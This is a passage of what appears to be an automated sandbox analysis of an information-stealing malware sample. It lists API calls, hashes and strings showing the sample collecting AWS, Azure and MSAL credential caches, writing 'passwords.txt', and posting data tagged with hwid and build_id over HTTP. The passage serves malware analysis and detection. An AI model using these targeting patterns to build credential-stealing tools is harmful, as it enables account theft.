                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                    • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                                                                    • API String ID: 2819533921-2709115261
                                                                                                                                                                    • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                    • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                                                                    • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                                                                                    Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                                                                                      • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                                                                                      • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                    • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                    • API String ID: 2840494320-4129404369
                                                                                                                                                                    • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                    • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                                                                                    • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                                                                                    • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                                                                                    Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                                                                                    • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                                                                                    • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                    • String ID: passwords.txt
                                                                                                                                                                    • API String ID: 1956182324-347816968
                                                                                                                                                                    • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                    • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                                                                                    • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                                                                                    • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                                                                                    Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2315 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2330 404bf5 2315->2330 2331 404bfb-404c01 2315->2331 2330->2331 2332 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2331->2332 2333 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2331->2333 2333->2332 2402 404d97-404dd1 HttpOpenRequestA 2333->2402 2403 404dd7-404ddd 2402->2403 2404 405188-40518e InternetCloseHandle 2402->2404 2405 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2403->2405 2406 404ddf-404df5 InternetSetOptionA 2403->2406 2404->2332 2509 40515c-405174 InternetReadFile 2405->2509 2406->2405 2510 405176-405183 InternetCloseHandle call 402920 2509->2510 2511 40511c-405124 2509->2511 2510->2404 2511->2510 2512 405126-405157 call 410609 call 41058d call 402920 2511->2512 2512->2509
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                    • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                                                                                    • API String ID: 3006978581-858375883
                                                                                                                                                                    • Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                    • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
                                                                                                                                                                    • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                                                                                    Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                                                                                    • wsprintfW.USER32 ref: 004016BC
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                                                                                    • _time64.MSVCRT ref: 0040170E
                                                                                                                                                                    • srand.MSVCRT ref: 00401715
                                                                                                                                                                    • rand.MSVCRT ref: 0040171E
                                                                                                                                                                    • _memset.LIBCMT ref: 0040172E
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                                                                                    • _memset.LIBCMT ref: 00401763
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                                                                                    • _memset.LIBCMT ref: 004017BE
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                    • String ID: %s%s$delays.tmp
                                                                                                                                                                    • API String ID: 1620473967-1413376734
                                                                                                                                                                    • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                    • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                                                                                    Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004164E2
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                                                                      • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                                                                      • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                                                                      • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                                                                      • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                                                                    • _memset.LIBCMT ref: 00416556
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
                                                                                                                                                                      • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                                                                      • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                                                                      • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                                                                      • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                                                                      • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                                                                    • _memset.LIBCMT ref: 004165CA
                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004165EC
                                                                                                                                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
                                                                                                                                                                    • _memset.LIBCMT ref: 0041663E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                    • API String ID: 780282842-974132213
                                                                                                                                                                    • Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
                                                                                                                                                                    • Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
                                                                                                                                                                    • Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
